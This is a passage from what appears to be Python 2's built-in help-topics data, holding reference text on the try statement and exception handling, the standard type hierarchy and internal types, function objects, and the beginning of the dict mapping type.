exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. 
(This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n   >>> def f():\n   ...     try:\n   ...         1/0\n   ...     finally:\n   ...         return 42\n   ...\n   >>> f()\n   42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n   >>> def foo():\n   ...     try:\n   ...         return \'try\'\n   ...     finally:\n   ...         return \'finally\'\n   ...\n   >>> foo()\n   \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n', 'types': u'\nThe standard type hierarchy\n***************************\n\nBelow is a list of the types that are built into Python. Extension\nmodules (written in C, Java, or other languages, depending on the\nimplementation) can define additional types. Future versions of\nPython may add types to the type hierarchy (e.g., rational numbers,\nefficiently stored arrays of integers, etc.).\n\nSome of the type descriptions below contain a paragraph listing\n\'special attributes.\' These are attributes that provide access to the\nimplementation and are not intended for general use. Their definition\nmay change in the future.\n\nNone\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name "None". 
It\n is used to signify the absence of a value in many situations, e.g.,\n it is returned from functions that don\'t explicitly return\n anything. Its truth value is false.\n\nNotImplemented\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "NotImplemented". Numeric methods and rich comparison methods may\n return this value if they do not implement the operation for the\n operands provided. (The interpreter will then try the reflected\n operation, or some other fallback, depending on the operator.) Its\n truth value is true.\n\nEllipsis\n This type has a single value. There is a single object with this\n value. This object is accessed through the built-in name\n "Ellipsis". It is used to indicate the presence of the "..." syntax\n in a slice. Its truth value is true.\n\n"numbers.Number"\n These are created by numeric literals and returned as results by\n arithmetic operators and arithmetic built-in functions. Numeric\n objects are immutable; once created their value never changes.\n Python numbers are of course strongly related to mathematical\n numbers, but subject to the limitations of numerical representation\n in computers.\n\n Python distinguishes between integers, floating point numbers, and\n complex numbers:\n\n "numbers.Integral"\n These represent elements from the mathematical set of integers\n (positive and negative).\n\n There are three types of integers:\n\n Plain integers\n These represent numbers in the range -2147483648 through\n 2147483647. (The range may be larger on machines with a\n larger natural word size, but not smaller.) When the result\n of an operation would fall outside this range, the result is\n normally returned as a long integer (in some cases, the\n exception "OverflowError" is raised instead). For the\n purpose of shift and mask operations, integers are assumed to\n have a binary, 2\'s complement notation using 32 or more bits,\n and hiding no bits from the user (i.e., all 4294967296\n different bit patterns correspond to different values).\n\n Long integers\n These represent numbers in an unlimited range, subject to\n available (virtual) memory only. For the purpose of shift\n and mask operations, a binary representation is assumed, and\n negative numbers are represented in a variant of 2\'s\n complement which gives the illusion of an infinite string of\n sign bits extending to the left.\n\n Booleans\n These represent the truth values False and True. The two\n objects representing the values "False" and "True" are the\n only Boolean objects. The Boolean type is a subtype of plain\n integers, and Boolean values behave like the values 0 and 1,\n respectively, in almost all contexts, the exception being\n that when converted to a string, the strings ""False"" or\n ""True"" are returned, respectively.\n\n The rules for integer representation are intended to give the\n most meaningful interpretation of shift and mask operations\n involving negative integers and the least surprises when\n switching between the plain and long integer domains. Any\n operation, if it yields a result in the plain integer domain,\n will yield the same result in the long integer domain or when\n using mixed operands. The switch between domains is transparent\n to the programmer.\n\n "numbers.Real" ("float")\n These represent machine-level double precision floating point\n numbers. 
You are at the mercy of the underlying machine\n architecture (and C or Java implementation) for the accepted\n range and handling of overflow. Python does not support single-\n precision floating point numbers; the savings in processor and\n memory usage that are usually the reason for using these are\n dwarfed by the overhead of using objects in Python, so there is\n no reason to complicate the language with two kinds of floating\n point numbers.\n\n "numbers.Complex"\n These represent complex numbers as a pair of machine-level\n double precision floating point numbers. The same caveats apply\n as for floating point numbers. The real and imaginary parts of a\n complex number "z" can be retrieved through the read-only\n attributes "z.real" and "z.imag".\n\nSequences\n These represent finite ordered sets indexed by non-negative\n numbers. The built-in function "len()" returns the number of items\n of a sequence. When the length of a sequence is *n*, the index set\n contains the numbers 0, 1, ..., *n*-1. Item *i* of sequence *a* is\n selected by "a[i]".\n\n Sequences also support slicing: "a[i:j]" selects all items with\n index *k* such that *i* "<=" *k* "<" *j*. When used as an\n expression, a slice is a sequence of the same type. This implies\n that the index set is renumbered so that it starts at 0.\n\n Some sequences also support "extended slicing" with a third "step"\n parameter: "a[i:j:k]" selects all items of *a* with index *x* where\n "x = i + n*k", *n* ">=" "0" and *i* "<=" *x* "<" *j*.\n\n Sequences are distinguished according to their mutability:\n\n Immutable sequences\n An object of an immutable sequence type cannot change once it is\n created. (If the object contains references to other objects,\n these other objects may be mutable and may be changed; however,\n the collection of objects directly referenced by an immutable\n object cannot change.)\n\n The following types are immutable sequences:\n\n Strings\n The items of a string are characters. There is no separate\n character type; a character is represented by a string of one\n item. Characters represent (at least) 8-bit bytes. The\n built-in functions "chr()" and "ord()" convert between\n characters and nonnegative integers representing the byte\n values. Bytes with the values 0-127 usually represent the\n corresponding ASCII values, but the interpretation of values\n is up to the program. The string data type is also used to\n represent arrays of bytes, e.g., to hold data read from a\n file.\n\n (On systems whose native character set is not ASCII, strings\n may use EBCDIC in their internal representation, provided the\n functions "chr()" and "ord()" implement a mapping between\n ASCII and EBCDIC, and string comparison preserves the ASCII\n order. Or perhaps someone can propose a better rule?)\n\n Unicode\n The items of a Unicode object are Unicode code units. A\n Unicode code unit is represented by a Unicode object of one\n item and can hold either a 16-bit or 32-bit value\n representing a Unicode ordinal (the maximum value for the\n ordinal is given in "sys.maxunicode", and depends on how\n Python is configured at compile time). Surrogate pairs may\n be present in the Unicode object, and will be reported as two\n separate items. The built-in functions "unichr()" and\n "ord()" convert between code units and nonnegative integers\n representing the Unicode ordinals as defined in the Unicode\n Standard 3.0. 
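For example:\n\n   >>> unichr(8364)\n   u\'\\u20ac\'\n   >>> ord(u\'\\u20ac\')\n   8364\n\n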
Conversion from and to other encodings are\n possible through the Unicode method "encode()" and the built-\n in function "unicode()".\n\n Tuples\n The items of a tuple are arbitrary Python objects. Tuples of\n two or more items are formed by comma-separated lists of\n expressions. A tuple of one item (a \'singleton\') can be\n formed by affixing a comma to an expression (an expression by\n itself does not create a tuple, since parentheses must be\n usable for grouping of expressions). An empty tuple can be\n formed by an empty pair of parentheses.\n\n Mutable sequences\n Mutable sequences can be changed after they are created. The\n subscription and slicing notations can be used as the target of\n assignment and "del" (delete) statements.\n\n There are currently two intrinsic mutable sequence types:\n\n Lists\n The items of a list are arbitrary Python objects. Lists are\n formed by placing a comma-separated list of expressions in\n square brackets. (Note that there are no special cases needed\n to form lists of length 0 or 1.)\n\n Byte Arrays\n A bytearray object is a mutable array. They are created by\n the built-in "bytearray()" constructor. Aside from being\n mutable (and hence unhashable), byte arrays otherwise provide\n the same interface and functionality as immutable bytes\n objects.\n\n The extension module "array" provides an additional example of a\n mutable sequence type.\n\nSet types\n These represent unordered, finite sets of unique, immutable\n objects. As such, they cannot be indexed by any subscript. However,\n they can be iterated over, and the built-in function "len()"\n returns the number of items in a set. Common uses for sets are fast\n membership testing, removing duplicates from a sequence, and\n computing mathematical operations such as intersection, union,\n difference, and symmetric difference.\n\n For set elements, the same immutability rules apply as for\n dictionary keys. Note that numeric types obey the normal rules for\n numeric comparison: if two numbers compare equal (e.g., "1" and\n "1.0"), only one of them can be contained in a set.\n\n There are currently two intrinsic set types:\n\n Sets\n These represent a mutable set. They are created by the built-in\n "set()" constructor and can be modified afterwards by several\n methods, such as "add()".\n\n Frozen sets\n These represent an immutable set. They are created by the\n built-in "frozenset()" constructor. As a frozenset is immutable\n and *hashable*, it can be used again as an element of another\n set, or as a dictionary key.\n\nMappings\n These represent finite sets of objects indexed by arbitrary index\n sets. The subscript notation "a[k]" selects the item indexed by "k"\n from the mapping "a"; this can be used in expressions and as the\n target of assignments or "del" statements. The built-in function\n "len()" returns the number of items in a mapping.\n\n There is currently a single intrinsic mapping type:\n\n Dictionaries\n These represent finite sets of objects indexed by nearly\n arbitrary values. 
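For example, a "frozenset", being hashable, can serve as a dictionary\nkey, while mutable sets cannot:\n\n   >>> d = {frozenset([1, 2]): \'ok\'}\n   >>> d[frozenset([2, 1])]\n   \'ok\'\n\n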
The only types of values not acceptable as\n keys are values containing lists or dictionaries or other\n mutable types that are compared by value rather than by object\n identity, the reason being that the efficient implementation of\n dictionaries requires a key\'s hash value to remain constant.\n Numeric types used for keys obey the normal rules for numeric\n comparison: if two numbers compare equal (e.g., "1" and "1.0")\n then they can be used interchangeably to index the same\n dictionary entry.\n\n Dictionaries are mutable; they can be created by the "{...}"\n notation (see section Dictionary displays).\n\n The extension modules "dbm", "gdbm", and "bsddb" provide\n additional examples of mapping types.\n\nCallable types\n These are the types to which the function call operation (see\n section Calls) can be applied:\n\n User-defined functions\n A user-defined function object is created by a function\n definition (see section Function definitions). It should be\n called with an argument list containing the same number of items\n as the function\'s formal parameter list.\n\n Special attributes:\n\n +-------------------------+---------------------------------+-------------+\n | Attribute | Meaning | |\n +=========================+=================================+=============+\n | "__doc__" "func_doc" | The function\'s documentation | Writable |\n | | string, or "None" if | |\n | | unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__name__" "func_name" | The function\'s name. | Writable |\n +-------------------------+---------------------------------+-------------+\n | "__module__" | The name of the module the | Writable |\n | | function was defined in, or | |\n | | "None" if unavailable. | |\n +-------------------------+---------------------------------+-------------+\n | "__defaults__" | A tuple containing default | Writable |\n | "func_defaults" | argument values for those | |\n | | arguments that have defaults, | |\n | | or "None" if no arguments have | |\n | | a default value. | |\n +-------------------------+---------------------------------+-------------+\n | "__code__" "func_code" | The code object representing | Writable |\n | | the compiled function body. | |\n +-------------------------+---------------------------------+-------------+\n | "__globals__" | A reference to the dictionary | Read-only |\n | "func_globals" | that holds the function\'s | |\n | | global variables --- the global | |\n | | namespace of the module in | |\n | | which the function was defined. | |\n +-------------------------+---------------------------------+-------------+\n | "__dict__" "func_dict" | The namespace supporting | Writable |\n | | arbitrary function attributes. | |\n +-------------------------+---------------------------------+-------------+\n | "__closure__" | "None" or a tuple of cells that | Read-only |\n | "func_closure" | contain bindings for the | |\n | | function\'s free variables. 
| |\n +-------------------------+---------------------------------+-------------+\n\n Most of the attributes labelled "Writable" check the type of the\n assigned value.\n\n Changed in version 2.4: "func_name" is now writable.\n\n Changed in version 2.6: The double-underscore attributes\n "__closure__", "__code__", "__defaults__", and "__globals__"\n were introduced as aliases for the corresponding "func_*"\n attributes for forwards compatibility with Python 3.\n\n Function objects also support getting and setting arbitrary\n attributes, which can be used, for example, to attach metadata\n to functions. Regular attribute dot-notation is used to get and\n set such attributes. *Note that the current implementation only\n supports function attributes on user-defined functions. Function\n attributes on built-in functions may be supported in the\n future.*\n\n Additional information about a function\'s definition can be\n retrieved from its code object; see the description of internal\n types below.\n\n User-defined methods\n A user-defined method object combines a class, a class instance\n (or "None") and any callable object (normally a user-defined\n function).\n\n Special read-only attributes: "im_self" is the class instance\n object, "im_func" is the function object; "im_class" is the\n class of "im_self" for bound methods or the class that asked for\n the method for unbound methods; "__doc__" is the method\'s\n documentation (same as "im_func.__doc__"); "__name__" is the\n method name (same as "im_func.__name__"); "__module__" is the\n name of the module the method was defined in, or "None" if\n unavailable.\n\n Changed in version 2.2: "im_self" used to refer to the class\n that defined the method.\n\n Changed in version 2.6: For Python 3 forward-compatibility,\n "im_func" is also available as "__func__", and "im_self" as\n "__self__".\n\n Methods also support accessing (but not setting) the arbitrary\n function attributes on the underlying function object.\n\n User-defined method objects may be created when getting an\n attribute of a class (perhaps via an instance of that class), if\n that attribute is a user-defined function object, an unbound\n user-defined method object, or a class method object. When the\n attribute is a user-defined method object, a new method object\n is only created if the class from which it is being retrieved is\n the same as, or a derived class of, the class stored in the\n original method object; otherwise, the original method object is\n used as it is.\n\n When a user-defined method object is created by retrieving a\n user-defined function object from a class, its "im_self"\n attribute is "None" and the method object is said to be unbound.\n When one is created by retrieving a user-defined function object\n from a class via one of its instances, its "im_self" attribute\n is the instance, and the method object is said to be bound. 
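The distinction is visible interactively (a minimal sketch with an\n invented class):\n\n >>> class C:\n ... def f(self):\n ... pass\n ...\n >>> C.f.im_self is None # unbound\n True\n >>> x = C()\n >>> x.f.im_self is x # bound to the instance\n True\n >>> C.f.im_func is x.f.im_func # same underlying function\n True\n\n 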
In\n either case, the new method\'s "im_class" attribute is the class\n from which the retrieval takes place, and its "im_func"\n attribute is the original function object.\n\n When a user-defined method object is created by retrieving\n another method object from a class or instance, the behaviour is\n the same as for a function object, except that the "im_func"\n attribute of the new instance is not the original method object\n but its "im_func" attribute.\n\n When a user-defined method object is created by retrieving a\n class method object from a class or instance, its "im_self"\n attribute is the class itself, and its "im_func" attribute is\n the function object underlying the class method.\n\n When an unbound user-defined method object is called, the\n underlying function ("im_func") is called, with the restriction\n that the first argument must be an instance of the proper class\n ("im_class") or of a derived class thereof.\n\n When a bound user-defined method object is called, the\n underlying function ("im_func") is called, inserting the class\n instance ("im_self") in front of the argument list. For\n instance, when "C" is a class which contains a definition for a\n function "f()", and "x" is an instance of "C", calling "x.f(1)"\n is equivalent to calling "C.f(x, 1)".\n\n When a user-defined method object is derived from a class method\n object, the "class instance" stored in "im_self" will actually\n be the class itself, so that calling either "x.f(1)" or "C.f(1)"\n is equivalent to calling "f(C,1)" where "f" is the underlying\n function.\n\n Note that the transformation from function object to (unbound or\n bound) method object happens each time the attribute is\n retrieved from the class or instance. In some cases, a fruitful\n optimization is to assign the attribute to a local variable and\n call that local variable. Also notice that this transformation\n only happens for user-defined functions; other callable objects\n (and all non-callable objects) are retrieved without\n transformation. It is also important to note that user-defined\n functions which are attributes of a class instance are not\n converted to bound methods; this *only* happens when the\n function is an attribute of the class.\n\n Generator functions\n A function or method which uses the "yield" statement (see\n section The yield statement) is called a *generator function*.\n Such a function, when called, always returns an iterator object\n which can be used to execute the body of the function: calling\n the iterator\'s "next()" method will cause the function to\n execute until it provides a value using the "yield" statement.\n When the function executes a "return" statement or falls off the\n end, a "StopIteration" exception is raised and the iterator will\n have reached the end of the set of values to be returned.\n\n Built-in functions\n A built-in function object is a wrapper around a C function.\n Examples of built-in functions are "len()" and "math.sin()"\n ("math" is a standard built-in module). The number and type of\n the arguments are determined by the C function. 
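Both kinds of callable can be poked at interactively (a minimal\n sketch):\n\n >>> def gen():\n ... yield 1\n ...\n >>> it = gen()\n >>> it.next()\n 1\n >>> it.next()\n Traceback (most recent call last):\n ...\n StopIteration\n >>> type(len) # a built-in function is a wrapped C function\n <type \'builtin_function_or_method\'>\n\n 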
Special read-\n only attributes: "__doc__" is the function\'s documentation\n string, or "None" if unavailable; "__name__" is the function\'s\n name; "__self__" is set to "None" (but see the next item);\n "__module__" is the name of the module the function was defined\n in or "None" if unavailable.\n\n Built-in methods\n This is really a different disguise of a built-in function, this\n time containing an object passed to the C function as an\n implicit extra argument. An example of a built-in method is\n "alist.append()", assuming *alist* is a list object. In this\n case, the special read-only attribute "__self__" is set to the\n object denoted by *alist*.\n\n Class Types\n Class types, or "new-style classes," are callable. These\n objects normally act as factories for new instances of\n themselves, but variations are possible for class types that\n override "__new__()". The arguments of the call are passed to\n "__new__()" and, in the typical case, to "__init__()" to\n initialize the new instance.\n\n Classic Classes\n Class objects are described below. When a class object is\n called, a new class instance (also described below) is created\n and returned. This implies a call to the class\'s "__init__()"\n method if it has one. Any arguments are passed on to the\n "__init__()" method. If there is no "__init__()" method, the\n class must be called without arguments.\n\n Class instances\n Class instances are described below. Class instances are\n callable only when the class has a "__call__()" method;\n "x(arguments)" is a shorthand for "x.__call__(arguments)".\n\nModules\n Modules are imported by the "import" statement (see section The\n import statement). A module object has a namespace implemented by a\n dictionary object (this is the dictionary referenced by the\n func_globals attribute of functions defined in the module).\n Attribute references are translated to lookups in this dictionary,\n e.g., "m.x" is equivalent to "m.__dict__["x"]". A module object\n does not contain the code object used to initialize the module\n (since it isn\'t needed once the initialization is done).\n\n Attribute assignment updates the module\'s namespace dictionary,\n e.g., "m.x = 1" is equivalent to "m.__dict__["x"] = 1".\n\n Special read-only attribute: "__dict__" is the module\'s namespace\n as a dictionary object.\n\n **CPython implementation detail:** Because of the way CPython\n clears module dictionaries, the module dictionary will be cleared\n when the module falls out of scope even if the dictionary still has\n live references. To avoid this, copy the dictionary or keep the\n module around while using its dictionary directly.\n\n Predefined (writable) attributes: "__name__" is the module\'s name;\n "__doc__" is the module\'s documentation string, or "None" if\n unavailable; "__file__" is the pathname of the file from which the\n module was loaded, if it was loaded from a file. The "__file__"\n attribute is not present for C modules that are statically linked\n into the interpreter; for extension modules loaded dynamically from\n a shared library, it is the pathname of the shared library file.\n\nClasses\n Both class types (new-style classes) and class objects (old-\n style/classic classes) are typically created by class definitions\n (see section Class definitions). A class has a namespace\n implemented by a dictionary object. 
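For example (a sketch; the class is invented):\n\n >>> class C(object):\n ... x = 1\n ...\n >>> C.__dict__[\'x\']\n 1\n\n 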
Class attribute references are\n translated to lookups in this dictionary, e.g., "C.x" is translated\n to "C.__dict__["x"]" (although for new-style classes in particular\n there are a number of hooks which allow for other means of locating\n attributes). When the attribute name is not found there, the\n attribute search continues in the base classes. For old-style\n classes, the search is depth-first, left-to-right in the order of\n occurrence in the base class list. New-style classes use the more\n complex C3 method resolution order which behaves correctly even in\n the presence of \'diamond\' inheritance structures where there are\n multiple inheritance paths leading back to a common ancestor.\n Additional details on the C3 MRO used by new-style classes can be\n found in the documentation accompanying the 2.3 release at\n https://www.python.org/download/releases/2.3/mro/.\n\n When a class attribute reference (for class "C", say) would yield a\n user-defined function object or an unbound user-defined method\n object whose associated class is either "C" or one of its base\n classes, it is transformed into an unbound user-defined method\n object whose "im_class" attribute is "C". When it would yield a\n class method object, it is transformed into a bound user-defined\n method object whose "im_self" attribute is "C". When it would\n yield a static method object, it is transformed into the object\n wrapped by the static method object. See section Implementing\n Descriptors for another way in which attributes retrieved from a\n class may differ from those actually contained in its "__dict__"\n (note that only new-style classes support descriptors).\n\n Class attribute assignments update the class\'s dictionary, never\n the dictionary of a base class.\n\n A class object can be called (see above) to yield a class instance\n (see below).\n\n Special attributes: "__name__" is the class name; "__module__" is\n the module name in which the class was defined; "__dict__" is the\n dictionary containing the class\'s namespace; "__bases__" is a tuple\n (possibly empty or a singleton) containing the base classes, in the\n order of their occurrence in the base class list; "__doc__" is the\n class\'s documentation string, or None if undefined.\n\nClass instances\n A class instance is created by calling a class object (see above).\n A class instance has a namespace implemented as a dictionary which\n is the first place in which attribute references are searched.\n When an attribute is not found there, and the instance\'s class has\n an attribute by that name, the search continues with the class\n attributes. If a class attribute is found that is a user-defined\n function object or an unbound user-defined method object whose\n associated class is the class (call it "C") of the instance for\n which the attribute reference was initiated or one of its bases, it\n is transformed into a bound user-defined method object whose\n "im_class" attribute is "C" and whose "im_self" attribute is the\n instance. Static method and class method objects are also\n transformed, as if they had been retrieved from class "C"; see\n above under "Classes". See section Implementing Descriptors for\n another way in which attributes of a class retrieved via its\n instances may differ from the objects actually stored in the\n class\'s "__dict__". 
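The instance dictionary is consulted first (a minimal sketch):\n\n >>> class C(object):\n ... x = \'class\'\n ...\n >>> c = C()\n >>> c.x # found on the class\n \'class\'\n >>> c.x = \'instance\' # stored in, and then found in, c.__dict__\n >>> c.x\n \'instance\'\n\n 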
If no class attribute is found, and the\n object\'s class has a "__getattr__()" method, that is called to\n satisfy the lookup.\n\n Attribute assignments and deletions update the instance\'s\n dictionary, never a class\'s dictionary. If the class has a\n "__setattr__()" or "__delattr__()" method, this is called instead\n of updating the instance dictionary directly.\n\n Class instances can pretend to be numbers, sequences, or mappings\n if they have methods with certain special names. See section\n Special method names.\n\n Special attributes: "__dict__" is the attribute dictionary;\n "__class__" is the instance\'s class.\n\nFiles\n A file object represents an open file. File objects are created by\n the "open()" built-in function, and also by "os.popen()",\n "os.fdopen()", and the "makefile()" method of socket objects (and\n perhaps by other functions or methods provided by extension\n modules). The objects "sys.stdin", "sys.stdout" and "sys.stderr"\n are initialized to file objects corresponding to the interpreter\'s\n standard input, output and error streams. See File Objects for\n complete documentation of file objects.\n\nInternal types\n A few types used internally by the interpreter are exposed to the\n user. Their definitions may change with future versions of the\n interpreter, but they are mentioned here for completeness.\n\n Code objects\n Code objects represent *byte-compiled* executable Python code,\n or *bytecode*. The difference between a code object and a\n function object is that the function object contains an explicit\n reference to the function\'s globals (the module in which it was\n defined), while a code object contains no context; also the\n default argument values are stored in the function object, not\n in the code object (because they represent values calculated at\n run-time). 
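The split is easy to observe (a sketch; the "func_*" spellings are\n the Python 2 aliases described earlier):\n\n >>> def f(x, y=10):\n ... return x + y\n ...\n >>> f.func_defaults # kept on the function object\n (10,)\n >>> f.func_code.co_varnames # kept on the code object\n (\'x\', \'y\')\n\n 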
Unlike function objects, code objects are immutable\n and contain no references (directly or indirectly) to mutable\n objects.\n\n Special read-only attributes: "co_name" gives the function name;\n "co_argcount" is the number of positional arguments (including\n arguments with default values); "co_nlocals" is the number of\n local variables used by the function (including arguments);\n "co_varnames" is a tuple containing the names of the local\n variables (starting with the argument names); "co_cellvars" is a\n tuple containing the names of local variables that are\n referenced by nested functions; "co_freevars" is a tuple\n containing the names of free variables; "co_code" is a string\n representing the sequence of bytecode instructions; "co_consts"\n is a tuple containing the literals used by the bytecode;\n "co_names" is a tuple containing the names used by the bytecode;\n "co_filename" is the filename from which the code was compiled;\n "co_firstlineno" is the first line number of the function;\n "co_lnotab" is a string encoding the mapping from bytecode\n offsets to line numbers (for details see the source code of the\n interpreter); "co_stacksize" is the required stack size\n (including local variables); "co_flags" is an integer encoding a\n number of flags for the interpreter.\n\n The following flag bits are defined for "co_flags": bit "0x04"\n is set if the function uses the "*arguments" syntax to accept an\n arbitrary number of positional arguments; bit "0x08" is set if\n the function uses the "**keywords" syntax to accept arbitrary\n keyword arguments; bit "0x20" is set if the function is a\n generator.\n\n Future feature declarations ("from __future__ import division")\n also use bits in "co_flags" to indicate whether a code object\n was compiled with a particular feature enabled: bit "0x2000" is\n set if the function was compiled with future division enabled;\n bits "0x10" and "0x1000" were used in earlier versions of\n Python.\n\n Other bits in "co_flags" are reserved for internal use.\n\n If a code object represents a function, the first item in\n "co_consts" is the documentation string of the function, or\n "None" if undefined.\n\n Frame objects\n Frame objects represent execution frames. They may occur in\n traceback objects (see below).\n\n Special read-only attributes: "f_back" is to the previous stack\n frame (towards the caller), or "None" if this is the bottom\n stack frame; "f_code" is the code object being executed in this\n frame; "f_locals" is the dictionary used to look up local\n variables; "f_globals" is used for global variables;\n "f_builtins" is used for built-in (intrinsic) names;\n "f_restricted" is a flag indicating whether the function is\n executing in restricted execution mode; "f_lasti" gives the\n precise instruction (this is an index into the bytecode string\n of the code object).\n\n Special writable attributes: "f_trace", if not "None", is a\n function called at the start of each source code line (this is\n used by the debugger); "f_exc_type", "f_exc_value",\n "f_exc_traceback" represent the last exception raised in the\n parent frame provided another exception was ever raised in the\n current frame (in all other cases they are None); "f_lineno" is\n the current line number of the frame --- writing to this from\n within a trace function jumps to the given line (only for the\n bottom-most frame). 
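Outside of tracing, a frame can still be inspected via the\n CPython-specific "sys._getframe()" helper (illustrative sketch):\n\n >>> import sys\n >>> f = sys._getframe()\n >>> f.f_code.co_name\n \'<module>\'\n >>> f.f_globals is globals()\n True\n\n 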
A debugger can implement a Jump command\n (aka Set Next Statement) by writing to f_lineno.\n\n Traceback objects\n Traceback objects represent a stack trace of an exception. A\n traceback object is created when an exception occurs. When the\n search for an exception handler unwinds the execution stack, at\n each unwound level a traceback object is inserted in front of\n the current traceback. When an exception handler is entered,\n the stack trace is made available to the program. (See section\n The try statement.) It is accessible as "sys.exc_traceback", and\n also as the third item of the tuple returned by\n "sys.exc_info()". The latter is the preferred interface, since\n it works correctly when the program is using multiple threads.\n When the program contains no suitable handler, the stack trace\n is written (nicely formatted) to the standard error stream; if\n the interpreter is interactive, it is also made available to the\n user as "sys.last_traceback".\n\n Special read-only attributes: "tb_next" is the next level in the\n stack trace (towards the frame where the exception occurred), or\n "None" if there is no next level; "tb_frame" points to the\n execution frame of the current level; "tb_lineno" gives the line\n number where the exception occurred; "tb_lasti" indicates the\n precise instruction. The line number and last instruction in\n the traceback may differ from the line number of its frame\n object if the exception occurred in a "try" statement with no\n matching except clause or with a finally clause.\n\n Slice objects\n Slice objects are used to represent slices when *extended slice\n syntax* is used. This is a slice using two colons, or multiple\n slices or ellipses separated by commas, e.g., "a[i:j:step]",\n "a[i:j, k:l]", or "a[..., i:j]". They are also created by the\n built-in "slice()" function.\n\n Special read-only attributes: "start" is the lower bound; "stop"\n is the upper bound; "step" is the step value; each is "None" if\n omitted. These attributes can have any type.\n\n Slice objects support one method:\n\n slice.indices(self, length)\n\n This method takes a single integer argument *length* and\n computes information about the extended slice that the slice\n object would describe if applied to a sequence of *length*\n items. It returns a tuple of three integers; respectively\n these are the *start* and *stop* indices and the *step* or\n stride length of the slice. Missing or out-of-bounds indices\n are handled in a manner consistent with regular slices.\n\n New in version 2.3.\n\n Static method objects\n Static method objects provide a way of defeating the\n transformation of function objects to method objects described\n above. A static method object is a wrapper around any other\n object, usually a user-defined method object. When a static\n method object is retrieved from a class or a class instance, the\n object actually returned is the wrapped object, which is not\n subject to any further transformation. Static method objects are\n not themselves callable, although the objects they wrap usually\n are. Static method objects are created by the built-in\n "staticmethod()" constructor.\n\n Class method objects\n A class method object, like a static method object, is a wrapper\n around another object that alters the way in which that object\n is retrieved from classes and class instances. The behaviour of\n class method objects upon such retrieval is described above,\n under "User-defined methods". 
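Both wrappers can be compared side by side (a minimal sketch with\n invented names):\n\n >>> class C(object):\n ... def s():\n ... return \'no transformation\'\n ... s = staticmethod(s)\n ... def m(cls):\n ... return cls.__name__\n ... m = classmethod(m)\n ...\n >>> C.s()\n \'no transformation\'\n >>> C().m()\n \'C\'\n\n 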
Class method objects are created\n by the built-in "classmethod()" constructor.\n', 'typesfunctions': u'\nFunctions\n*********\n\nFunction objects are created by function definitions. The only\noperation on a function object is to call it: "func(argument-list)".\n\nThere are really two flavors of function objects: built-in functions\nand user-defined functions. Both support the same operation (to call\nthe function), but the implementation is different, hence the\ndifferent object types.\n\nSee Function definitions for more information.\n', 'typesmapping': u'\nMapping Types --- "dict"\n************************\n\nA *mapping* object maps *hashable* values to arbitrary objects.\nMappings are mutable objects. There is currently only one standard\nmapping type, the *dictionary*. (For other containers see the built\nin "list", "set", and "tuple" classes, and the "collections" module.)\n\nA dictionary\'s keys are *almost* arbitrary values. Values that are\nnot *hashable*, that is, values containing lists, dictionaries or\nother mutable types (that are compared by value rather than by object\nidentity) may not be used as keys. Numeric types used for keys obey\nthe normal rules for numeric comparison: if two numbers compare equal\n(such as "1" and "1.0") then they can be used interchangeably to index\nthe same dictionary entry. (Note however, that since computers store\nfloating-point numbers as approximations it is usually unwise to use\nthem as dictionary keys.)\n\nDictionaries can be created by placing a comma-separated list of "key:\nvalue" pairs within braces, for example: "{\'jack\': 4098, \'sjoerd\':\n4127}" or "{4098: \'jack\', 4127: \'sjoerd\'}", or by the "dict"\nconstructor.\n\nclass dict(**kwarg)\nclass dict(mapping, **kwarg)\nclass dict(iterable, **kwarg)\n\n Return a new dictionary initialized from an optional positional\n argument and a possibly empty set of keyword arguments.\n\n If no positional argument is given, an empty dictionary is created.\n If a positional argument is given and it is a mapping object, a\n dictionary is created with the same key-value pairs as the mapping\n object. Otherwise, the positional argument must be an *iterable*\n object. Each item in the iterable must itself be an iterable with\n exactly two objects. The first object of each item becomes a key\n in the new dictionary, and the second object the corresponding\n value. If a key occurs more than once, the last value for that key\n becomes 